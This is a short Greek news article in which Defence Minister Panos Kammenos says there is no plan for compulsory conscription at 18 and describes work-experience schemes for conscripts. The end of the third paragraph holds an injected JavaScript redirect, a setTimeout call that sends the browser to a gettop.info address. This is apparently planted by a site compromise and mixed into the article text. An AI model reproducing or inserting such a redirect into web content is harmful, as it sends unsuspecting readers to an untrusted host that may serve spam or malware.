Καμμένος: Δεν υπάρχει θέμα υποχρεωτικής στράτευσης για τους νέους ηλικίας 18 ετών

0
6

 

Προθέσεις της κυβέρνησης είναι να δοθεί η δυνατότητα σε άτομα νεαρής ηλικίας να αποκτούν επαγγελματική εμπειρία, ταυτόχρονα με τη στρατιωτική τους θητεία σημείωσε ο υπουργός Εθνικής Άμυνας Πάνος Καμμένος μιλώντας σε εκδήλωση στη Θεσσαλονίκη, ξεκαθαρίζοντας πως «δεν υπάρχει θέμα υποχρεωτικής στράτευση νεαρών στην ηλικία των 18 ετών».

Όσοι νεαροί επιθυμούν θα μπορούν να στρατεύονται και ταυτόχρονα να αποκτούν επαγγελματική εμπειρίαΌπως εξήγησε ο υπουργός, στο περιθώριο εκδήλωσης με θέμα τη συμμετοχή των ελληνικών επιχειρήσεων στις προμήθειες των Ενόπλων Δυνάμεων.

«Να μπορούν οι νέοι να αποκτούν μια εμπειρία, π.χ. στα κομπιούτερ, έχουμε κάνει μια συμφωνία με τη Microsoft, μια εμπειρία με τη ΜΟΜΑ σε έργα ή σε χειρισμό βαρέων μηχανημάτων», επεσήμανε ο υπουργός και συμπλήρωσε ότι η επαγγελματική αυτή εμπειρία θα δίδεται σε συνεργασία με οργανισμούς εκπαίδευσης που θα βοηθήσουν τους στρατεύσιμους και θα τους προετοιμάσουν μελλοντικά για να ενταχθούν στην αγορά εργασίας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here